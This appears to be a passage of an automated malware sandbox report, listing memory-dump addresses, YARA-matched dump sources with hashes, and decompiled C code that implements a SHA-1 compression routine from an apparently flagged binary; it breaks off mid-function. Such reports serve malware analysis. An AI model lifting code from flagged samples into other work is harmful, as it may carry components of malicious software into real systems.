            0x0041d0eb
            0x0041d0ec
            0x0041d0f4
            0x0041d0fa
            0x0041d101
            0x0041d107
            0x0041d107
            0x0041d119
            0x0041d119
            0x0041d12a
            0x0041d130
            0x0041d139
            0x0041d145
            0x0041d14f
            0x0041d15b
            0x0041d15c
            0x0041d163
            0x0041d167
            0x0041d173
            0x0041d178
            0x0041d18b
            0x0041dd03
            0x0041dd03
            0x0041dd0a
            0x0041dd0b
            0x0041dd10
            0x0041dd10
            0x0041dd11
            0x0041dd18
            0x0041dd18
            0x0041dd18
            0x0041dd1e
            0x0041dd25
            0x0041dd25
            0x0041dcfd
            0x0041dbea
            0x0041dbdd
            0x0041dbd1
            0x0041db8c
            0x0041da66
            0x0041da24
            0x0041d9a0
            0x0041d977
            0x0041d939
            0x0041d878
            0x0041d843
            0x0041d810
            0x0041d804
            0x0041d7f7
            0x0041d7e7
            0x0041d7c1
            0x0041d795
            0x0041d6ed
            0x0041d6b1
            0x0041d67f
            0x0041d620
            0x0041d5ea
            0x0041d578
            0x0041d3db
            0x0041d33f
            0x0041d326
            0x0041d30d
            0x0041d2ce
            0x0041d247
            0x0041d233
            0x0041d213

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: %.?
            • API String ID: 0-1143580271
            • Opcode ID: 025e3457ae5a36a25f275044e8c7c38624274b10e1d040c2d593b7973b9fe61d
            • Instruction ID: 848145a389a9de07ec6dd436e04fd650184e3768f10c99e6a1b2a73db0ff74fa
            • Opcode Fuzzy Hash: 025e3457ae5a36a25f275044e8c7c38624274b10e1d040c2d593b7973b9fe61d
            • Instruction Fuzzy Hash: 2E627372908381CFDB16CF38DD8AA913FB2F756324B08424ED5A1975D2D7342666CF89
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: c1379558a401881c1aa3f5d640be06d0f5788e9e501cc2392e2440cba8758e50
            • Instruction ID: a3bd86afedebc3027e6fab03184246648387fae3609261a65f267afbaed0cb55
            • Opcode Fuzzy Hash: c1379558a401881c1aa3f5d640be06d0f5788e9e501cc2392e2440cba8758e50
            • Instruction Fuzzy Hash: 2432E274604652DFDB24EF29C480372B7F1BF45300F1885AAE9868F286E735EC56DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0d0db68666f06800bf78f55cfb3ba3b11dadba6b3a49c401c2e2a03b3435c791
            • Instruction ID: 3c4fdc8aa1755e31113050eeab5969d37a6b6b8908f8ad743e58dcdd461e0402
            • Opcode Fuzzy Hash: 0d0db68666f06800bf78f55cfb3ba3b11dadba6b3a49c401c2e2a03b3435c791
            • Instruction Fuzzy Hash: BBD2EE9644F7E22FE3138F745CA4BA3BF6A9E53114B1D42DBE4E1DA193D1084369C3A2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E00409E2C(intOrPtr* _a4) {
            				signed int* _v0;
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				char _v304;
            				signed char* _t277;
            				signed int* _t278;
            				signed int _t279;
            				signed int _t285;
            				signed int _t288;
            				signed int _t292;
            				signed int _t295;
            				signed int _t299;
            				signed int _t303;
            				signed int _t305;
            				intOrPtr _t311;
            				signed int _t319;
            				signed int _t321;
            				signed int _t324;
            				signed int _t326;
            				signed int _t335;
            				signed int _t341;
            				signed int _t342;
            				signed int _t347;
            				signed int _t355;
            				signed int _t359;
            				signed int _t360;
            				signed int _t364;
            				signed int _t367;
            				signed int _t371;
            				signed int _t372;
            				signed int _t401;
            				signed int _t406;
            				signed int _t412;
            				signed int _t415;
            				signed int _t422;
            				signed int _t425;
            				signed int _t434;
            				signed int _t436;
            				signed int _t439;
            				signed int _t447;
            				signed int _t462;
            				signed int _t465;
            				signed int _t466;
            				signed int _t467;
            				signed int _t473;
            				signed int _t481;
            				signed int _t482;
            				intOrPtr* _t483;
            				signed int* _t486;
            				signed int _t493;
            				signed int _t496;
            				signed int _t501;
            				signed int _t504;
            				signed int _t507;
            				signed int _t510;
            				signed int _t511;
            				signed int _t515;
            				signed int _t527;
            				signed int _t530;
            				signed int _t537;
            				void* _t543;
            				void* _t545;
            
            				_push(0x550fc22a);
            				_t543 = _t545;
            				_t486 = _v0;
            				_t355 = 0;
            				_t2 =  &(_t486[7]); // 0x1b
            				_t277 = _t2;
            				do {
            					 *(_t543 + _t355 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
            					 *(_t543 + _t355 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
            					 *(_t543 + _t355 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
            					 *(_t543 + _t355 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
            					_t355 = _t355 + 4;
            					_t277 =  &(_t277[0x10]);
            				} while (_t355 < 0x10);
            				_t278 =  &_v304;
            				_v8 = 0x10;
            				do {
            					_t401 =  *(_t278 - 0x18);
            					_t462 =  *(_t278 - 0x14);
            					_t359 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t401;
            					asm("rol ecx, 1");
            					asm("rol ebx, 1");
            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t462;
            					_t278[8] = _t359;
            					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
            					_t278 =  &(_t278[4]);
            					asm("rol ebx, 1");
            					asm("rol edx, 1");
            					_t46 =  &_v8;
            					 *_t46 = _v8 - 1;
            					_t278[6] = _t319 ^ _t401;
            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t359 ^ _t462;
            				} while ( *_t46 != 0);
            				_t321 =  *_t486;
            				_t279 = _t486[1];
            				_t360 = _t486[2];
            				_t406 = _t486[3];
            				_v12 = _t321;
            				_v16 = _t486[4];
            				_v8 = 0;
            				do {
            					asm("rol ebx, 0x5");
            					_t465 = _v8;
            					_t493 = _t321 + ( !_t279 & _t406 | _t360 & _t279) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x14c)) + _v16 + 0x5a827999;
            					_t324 = _v12;
            					asm("ror eax, 0x2");
            					_v16 = _t406;
            					_v12 = _t493;
            					asm("rol esi, 0x5");
            					_v8 = _t360;
            					_t412 = _t493 + ( !_t324 & _t360 | _t279 & _t324) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x148)) + _v16 + 0x5a827999;
            					_t496 = _t279;
            					asm("ror ebx, 0x2");
            					_v16 = _v8;
            					_t364 = _v12;
            					_v8 = _t324;
            					_t326 = _v8;
            					_v12 = _t412;
            					asm("rol edx, 0x5");
            					_t285 = _t412 + ( !_t364 & _t496 | _t324 & _t364) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x144)) + _v16 + 0x5a827999;
            					_t415 = _v12;
            					_v16 = _t496;
            					asm("ror ecx, 0x2");
            					_v8 = _t364;
            					_v12 = _t285;
            					asm("rol eax, 0x5");
            					_v16 = _t326;
            					_t501 = _t285 + ( !_t415 & _t326 | _t364 & _t415) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x140)) + _v16 + 0x5a827999;
            					_t360 = _v12;
            					_t288 = _v8;
            					asm("ror edx, 0x2");
            					_v8 = _t415;
            					_v12 = _t501;
            					asm("rol esi, 0x5");
            					_v16 = _t288;
            					_t279 = _v12;
            					_t504 = _t501 + ( !_t360 & _t288 | _t415 & _t360) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x13c)) + _v16 + 0x5a827999;
            					_t406 = _v8;
            					asm("ror ecx, 0x2");
            					_t466 = _t465 + 5;
            					_t321 = _t504;
            					_v12 = _t321;
            					_v8 = _t466;
            				} while (_t466 < 0x14);
            				_t467 = 0x14;
            				do {
            					asm("rol esi, 0x5");
            					asm("ror eax, 0x2");
            					_v16 = _t406;
            					_t507 = _t504 + (_t406 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
            					_t335 = _v12;
            					_v12 = _t507;
            					asm("rol esi, 0x5");
            					_t422 = _t507 + (_t360 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
            					asm("ror ebx, 0x2");
            					_t510 = _t279;
            					_v16 = _t360;
            					_t367 = _v12;
            					_v12 = _t422;
            					asm("rol edx, 0x5");
            					asm("ror ecx, 0x2");
            					_t292 = _t422 + (_t279 ^ _t335 ^ _t367) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
            					_t425 = _v12;
            					_v8 = _t335;
            					_v8 = _t367;
            					_v12 = _t292;
            					asm("rol eax, 0x5");
            					_t467 = _t467 + 5;
            					_t360 = _v12;
            					asm("ror edx, 0x2");
            					_t146 = _t510 + 0x6ed9eba1; // 0x6ed9eb9f
            					_t511 = _t292 + (_t335 ^ _v8 ^ _t425) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x154)) + _t146;
            					_t295 = _v8;
            					_v8 = _t425;
            					_v12 = _t511;
            					asm("rol esi, 0x5");
            					_t406 = _v8;
            					_t504 = _t511 + (_t295 ^ _v8 ^ _t360) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
            					_v16 = _t295;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t504;
            				} while (_t467 < 0x28);
            				_v8 = 0x28;
            				do {
            					asm("rol esi, 0x5");
            					_v16 = _t406;
            					asm("ror eax, 0x2");
            					_t515 = ((_t360 | _t279) & _t406 | _t360 & _t279) +  *((intOrPtr*)(_t543 + _v8 * 4 - 0x14c)) + _t504 + _v16 - 0x70e44324;
            					_t473 = _v12;
            					_v12 = _t515;
            					asm("rol esi, 0x5");
            					_t341 = _v8;
            					asm("ror edi, 0x2");
            					_t434 = ((_t279 | _t473) & _t360 | _t279 & _t473) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x148)) + _t515 + _v16 - 0x70e44324;
            					_v16 = _t360;
            					_t371 = _v12;
            					_v12 = _t434;
            					asm("rol edx, 0x5");
            					_v8 = _t279;
            					_t436 = ((_t473 | _t371) & _t279 | _t473 & _t371) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x144)) + _t434 + _v16 - 0x70e44324;
            					asm("ror ecx, 0x2");
            					_v16 = _v8;
            					_t299 = _v12;
            					_v8 = _t473;
            					_v12 = _t436;
            					asm("rol edx, 0x5");
            					asm("ror eax, 0x2");
            					_t527 = ((_t371 | _t299) & _t473 | _t371 & _t299) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x140)) + _t436 + _v16 - 0x70e44324;
            					_v16 = _v8;
            					_t439 = _t371;
            					_t360 = _v12;
            					_v8 = _t439;
            					_v12 = _t527;
            					asm("rol esi, 0x5");
            					_v16 = _v8;
            					_t504 = ((_t299 | _t360) & _t439 | _t299 & _t360) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x13c)) + _t527 + _v16 - 0x70e44324;
            					_t406 = _t299;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t504;
            					_t342 = _t341 + 5;
            					_v8 = _t342;
            				} while (_t342 < 0x3c);
            				_t481 = 0x3c;
            				_v8 = 0x3c;
            				do {
            					asm("rol esi, 0x5");
            					_t482 = _v8;
            					asm("ror eax, 0x2");
            					_t530 = (_t406 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t543 + _t481 * 4 - 0x14c)) + _t504 + _v16 - 0x359d3e2a;
            					_t347 = _v12;
            					_v16 = _t406;
            					_v12 = _t530;
            					asm("rol esi, 0x5");
            					asm("ror ebx, 0x2");
            					_t447 = (_t360 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x148)) + _t530 + _v16 - 0x359d3e2a;
            					_v16 = _t360;
            					_t372 = _v12;
            					_v12 = _t447;
            					asm("rol edx, 0x5");
            					_v16 = _t279;
            					asm("ror ecx, 0x2");
            					_t303 = (_t279 ^ _t347 ^ _t372) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x144)) + _t447 + _v16 - 0x359d3e2a;
            					_t406 = _v12;
            					_v12 = _t303;
            					asm("rol eax, 0x5");
            					_v16 = _t347;
            					_t537 = (_t347 ^ _t372 ^ _t406) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
            					_t305 = _t372;
            					_v8 = _t347;
            					asm("ror edx, 0x2");
            					_v8 = _t372;
            					_t360 = _v12;
            					_v12 = _t537;
            					asm("rol esi, 0x5");
            					_t481 = _t482 + 5;
            					_t504 = (_t305 ^ _t406 ^ _t360) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x13c)) + _t537 + _v16 - 0x359d3e2a;
            					_v16 = _t305;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v8 = _t406;
            					_v12 = _t504;
            					_v8 = _t481;
            				} while (_t481 < 0x50);
            				_t483 = _a4;
            				 *((intOrPtr*)(_t483 + 8)) =  *((intOrPtr*)(_t483 + 8)) + _t360;
            				 *((intOrPtr*)(_t483 + 0xc)) =  *((intOrPtr*)(_t483 + 0xc)) + _t406;
            				_t311 =  *((intOrPtr*)(_t483 + 0x10)) + _v16;
            				 *_t483 =  *_t483 + _t504;
            				 *((intOrPtr*)(_t483 + 4)) =  *((intOrPtr*)(_t483 + 4)) + _t279;
            				 *((intOrPtr*)(_t483 + 0x10)) = _t311;
            				 *((intOrPtr*)(_t483 + 0x5c)) = 0;
            				return _t311;
            			}


































































            0x00409e2c
            0x00409e31
            0x00409e3b
            0x00409e3f
            0x00409e41
            0x00409e41
            0x00409e44
            0x00409e66
            0x00409e8c
            0x00409eb2
            0x00409ed4
            0x00409edb
            0x00409ede
            0x00409ee1
            0x00409eea
            0x00409ef0
            0x00409ef7
            0x00409f08
            0x00409f0b
            0x00409f0e
            0x00409f12
            0x00409f14
            0x00409f16
            0x00409f1f
            0x00409f22
            0x00409f25
            0x00409f30
            0x00409f36
            0x00409f38
            0x00409f38
            0x00409f3b
            0x00409f3e
            0x00409f3e
            0x00409f43
            0x00409f45
            0x00409f48
            0x00409f4b
            0x00409f51
            0x00409f54
            0x00409f57
            0x00409f60
            0x00409f66
            0x00409f6f
            0x00409f7e
            0x00409f85
            0x00409f88
            0x00409f8b
            0x00409f94
            0x00409f97
            0x00409f9a
            0x00409fb2
            0x00409fb9
            0x00409fbb
            0x00409fbe
            0x00409fc1
            0x00409fca
            0x00409fd1
            0x00409fd4
            0x00409fd7
            0x00409fe6
            0x00409fed
            0x00409ff0
            0x00409ff3
            0x00409ffc
            0x0040a006
            0x0040a009
            0x0040a015
            0x0040a018
            0x0040a01f
            0x0040a022
            0x0040a025
            0x0040a02a
            0x0040a02d
            0x0040a036
            0x0040a047
            0x0040a04a
            0x0040a04d
            0x0040a054
            0x0040a057
            0x0040a05a
            0x0040a05d
            0x0040a05f
            0x0040a062
            0x0040a065
            0x0040a06e
            0x0040a073
            0x0040a073
            0x0040a088
            0x0040a08b
            0x0040a08e
            0x0040a095
            0x0040a098
            0x0040a09b
            0x0040a0b0
            0x0040a0b7
            0x0040a0ba
            0x0040a0be
            0x0040a0c1
            0x0040a0c6
            0x0040a0c9
            0x0040a0d8
            0x0040a0db
            0x0040a0e2
            0x0040a0e5
            0x0040a0e8
            0x0040a0eb
            0x0040a0ee
            0x0040a0f6
            0x0040a104
            0x0040a107
            0x0040a10a
            0x0040a10a
            0x0040a111
            0x0040a114
            0x0040a117
            0x0040a11f
            0x0040a12d
            0x0040a130
            0x0040a137
            0x0040a13a
            0x0040a13d
            0x0040a140
            0x0040a143
            0x0040a14c
            0x0040a153
            0x0040a153
            0x0040a159
            0x0040a172
            0x0040a175
            0x0040a17c
            0x0040a17f
            0x0040a182
            0x0040a194
            0x0040a19e
            0x0040a1a1
            0x0040a1aa
            0x0040a1ad
            0x0040a1b4
            0x0040a1b7
            0x0040a1bd
            0x0040a1d0
            0x0040a1d7
            0x0040a1da
            0x0040a1dd
            0x0040a1e0
            0x0040a1e9
            0x0040a1ec
            0x0040a1ff
            0x0040a202
            0x0040a20c
            0x0040a20f
            0x0040a211
            0x0040a21a
            0x0040a21d
            0x0040a230
            0x0040a236
            0x0040a239
            0x0040a240
            0x0040a242
            0x0040a245
            0x0040a248
            0x0040a24b
            0x0040a24e
            0x0040a251
            0x0040a25a
            0x0040a25f
            0x0040a262
            0x0040a262
            0x0040a275
            0x0040a278
            0x0040a27b
            0x0040a282
            0x0040a285
            0x0040a288
            0x0040a28b
            0x0040a29e
            0x0040a2a1
            0x0040a2ac
            0x0040a2af
            0x0040a2bb
            0x0040a2be
            0x0040a2c4
            0x0040a2c7
            0x0040a2ca
            0x0040a2d1
            0x0040a2e1
            0x0040a2e4
            0x0040a2ea
            0x0040a2ed
            0x0040a2f4
            0x0040a2f6
            0x0040a2f9
            0x0040a2fc
            0x0040a2ff
            0x0040a302
            0x0040a309
            0x0040a318
            0x0040a31b
            0x0040a322
            0x0040a325
            0x0040a328
            0x0040a32b
            0x0040a32e
            0x0040a331
            0x0040a334
            0x0040a33d
            0x0040a34e
            0x0040a356
            0x0040a35c
            0x0040a35f
            0x0040a361
            0x0040a364
            0x0040a367
            0x0040a374

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 16ad0e83028ded31a3cdeddfc444c30f452b6fcd251fa8a92e51cf0b3739a772
            • Instruction ID: 85bcffc771d83be5445b10d2be3e0494e79f935d6969f565067c0c2cc8a6ac44
            • Opcode Fuzzy Hash: 16ad0e83028ded31a3cdeddfc444c30f452b6fcd251fa8a92e51cf0b3739a772
            • Instruction Fuzzy Hash: 71022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E00409E30(signed int* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				char _v304;
            				signed char* _t277;
            				signed int* _t278;
            				signed int _t279;
            				signed int _t285;
            				signed int _t288;
            				signed int _t292;
            				signed int _t295;
            				signed int _t299;
            				signed int _t303;
            				signed int _t305;
            				signed int _t311;
            				signed int _t318;
            				signed int _t320;
            				signed int _t323;
            				signed int _t325;
            				signed int _t334;
            				signed int _t340;
            				signed int _t341;
            				signed int _t346;
            				signed int _t353;
            				signed int _t357;
            				signed int _t358;
            				signed int _t362;
            				signed int _t365;
            				signed int _t369;
            				signed int _t370;
            				signed int _t399;
            				signed int _t404;
            				signed int _t410;
            				signed int _t413;
            				signed int _t420;
            				signed int _t423;
            				signed int _t432;
            				signed int _t434;
            				signed int _t437;
            				signed int _t445;
            				signed int _t459;
            				signed int _t462;
            				signed int _t463;
            				signed int _t464;
            				signed int _t470;
            				signed int _t478;
            				signed int _t479;
            				signed int* _t480;
            				signed int* _t481;
            				signed int _t488;
            				signed int _t491;
            				signed int _t496;
            				signed int _t499;
            				signed int _t502;
            				signed int _t505;
            				signed int _t506;
            				signed int _t510;
            				signed int _t522;
            				signed int _t525;
            				signed int _t532;
            				void* _t536;
            
            				_t481 = _a4;
            				_t353 = 0;
            				_t2 =  &(_t481[7]); // 0x1b
            				_t277 = _t2;
            				do {
            					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
            					_t353 = _t353 + 4;
            					_t277 =  &(_t277[0x10]);
            				} while (_t353 < 0x10);
            				_t278 =  &_v304;
            				_v8 = 0x10;
            				do {
            					_t399 =  *(_t278 - 0x18);
            					_t459 =  *(_t278 - 0x14);
            					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
            					asm("rol ecx, 1");
            					asm("rol ebx, 1");
            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
            					_t278[8] = _t357;
            					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
            					_t278 =  &(_t278[4]);
            					asm("rol ebx, 1");
            					asm("rol edx, 1");
            					_t46 =  &_v8;
            					 *_t46 = _v8 - 1;
            					_t278[6] = _t318 ^ _t399;
            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
            				} while ( *_t46 != 0);
            				_t320 =  *_t481;
            				_t279 = _t481[1];
            				_t358 = _t481[2];
            				_t404 = _t481[3];
            				_v12 = _t320;
            				_v16 = _t481[4];
            				_v8 = 0;
            				do {
            					asm("rol ebx, 0x5");
            					_t462 = _v8;
            					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
            					_t323 = _v12;
            					asm("ror eax, 0x2");
            					_v16 = _t404;
            					_v12 = _t488;
            					asm("rol esi, 0x5");
            					_v8 = _t358;
            					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
            					_t491 = _t279;
            					asm("ror ebx, 0x2");
            					_v16 = _v8;
            					_t362 = _v12;
            					_v8 = _t323;
            					_t325 = _v8;
            					_v12 = _t410;
            					asm("rol edx, 0x5");
            					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
            					_t413 = _v12;
            					_v16 = _t491;
            					asm("ror ecx, 0x2");
            					_v8 = _t362;
            					_v12 = _t285;
            					asm("rol eax, 0x5");
            					_v16 = _t325;
            					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
            					_t358 = _v12;
            					_t288 = _v8;
            					asm("ror edx, 0x2");
            					_v8 = _t413;
            					_v12 = _t496;
            					asm("rol esi, 0x5");
            					_v16 = _t288;
            					_t279 = _v12;
            					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
            					_t404 = _v8;
            					asm("ror ecx, 0x2");
            					_t463 = _t462 + 5;
            					_t320 = _t499;
            					_v12 = _t320;
            					_v8 = _t463;
            				} while (_t463 < 0x14);
            				_t464 = 0x14;
            				do {
            					asm("rol esi, 0x5");
            					asm("ror eax, 0x2");
            					_v16 = _t404;
            					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
            					_t334 = _v12;
            					_v12 = _t502;
            					asm("rol esi, 0x5");
            					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
            					asm("ror ebx, 0x2");
            					_t505 = _t279;
            					_v16 = _t358;
            					_t365 = _v12;
            					_v12 = _t420;
            					asm("rol edx, 0x5");
            					asm("ror ecx, 0x2");
            					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
            					_t423 = _v12;
            					_v8 = _t334;
            					_v8 = _t365;
            					_v12 = _t292;
            					asm("rol eax, 0x5");
            					_t464 = _t464 + 5;
            					_t358 = _v12;
            					asm("ror edx, 0x2");
            					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
            					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
            					_t295 = _v8;
            					_v8 = _t423;
            					_v12 = _t506;
            					asm("rol esi, 0x5");
            					_t404 = _v8;
            					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
            					_v16 = _t295;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t499;
            				} while (_t464 < 0x28);
            				_v8 = 0x28;
            				do {
            					asm("rol esi, 0x5");
            					_v16 = _t404;
            					asm("ror eax, 0x2");
            					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
            					_t470 = _v12;
            					_v12 = _t510;
            					asm("rol esi, 0x5");
            					_t340 = _v8;
            					asm("ror edi, 0x2");
            					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
            					_v16 = _t358;
            					_t369 = _v12;
            					_v12 = _t432;
            					asm("rol edx, 0x5");
            					_v8 = _t279;
            					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
            					asm("ror ecx, 0x2");
            					_v16 = _v8;
            					_t299 = _v12;
            					_v8 = _t470;
            					_v12 = _t434;
            					asm("rol edx, 0x5");
            					asm("ror eax, 0x2");
            					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
            					_v16 = _v8;
            					_t437 = _t369;
            					_t358 = _v12;
            					_v8 = _t437;
            					_v12 = _t522;
            					asm("rol esi, 0x5");
            					_v16 = _v8;
            					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
            					_t404 = _t299;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t499;
            					_t341 = _t340 + 5;
            					_v8 = _t341;
            				} while (_t341 < 0x3c);
            				_t478 = 0x3c;
            				_v8 = 0x3c;
            				do {
            					asm("rol esi, 0x5");
            					_t479 = _v8;
            					asm("ror eax, 0x2");
            					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
            					_t346 = _v12;
            					_v16 = _t404;
            					_v12 = _t525;
            					asm("rol esi, 0x5");
            					asm("ror ebx, 0x2");
            					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
            					_v16 = _t358;
            					_t370 = _v12;
            					_v12 = _t445;
            					asm("rol edx, 0x5");
            					_v16 = _t279;
            					asm("ror ecx, 0x2");
            					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
            					_t404 = _v12;
            					_v12 = _t303;
            					asm("rol eax, 0x5");
            					_v16 = _t346;
            					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
            					_t305 = _t370;
            					_v8 = _t346;
            					asm("ror edx, 0x2");
            					_v8 = _t370;
            					_t358 = _v12;
            					_v12 = _t532;
            					asm("rol esi, 0x5");
            					_t478 = _t479 + 5;
            					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
            					_v16 = _t305;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v8 = _t404;
            					_v12 = _t499;
            					_v8 = _t478;
            				} while (_t478 < 0x50);
            				_t480 = _a4;
            				_t480[2] = _t480[2] + _t358;
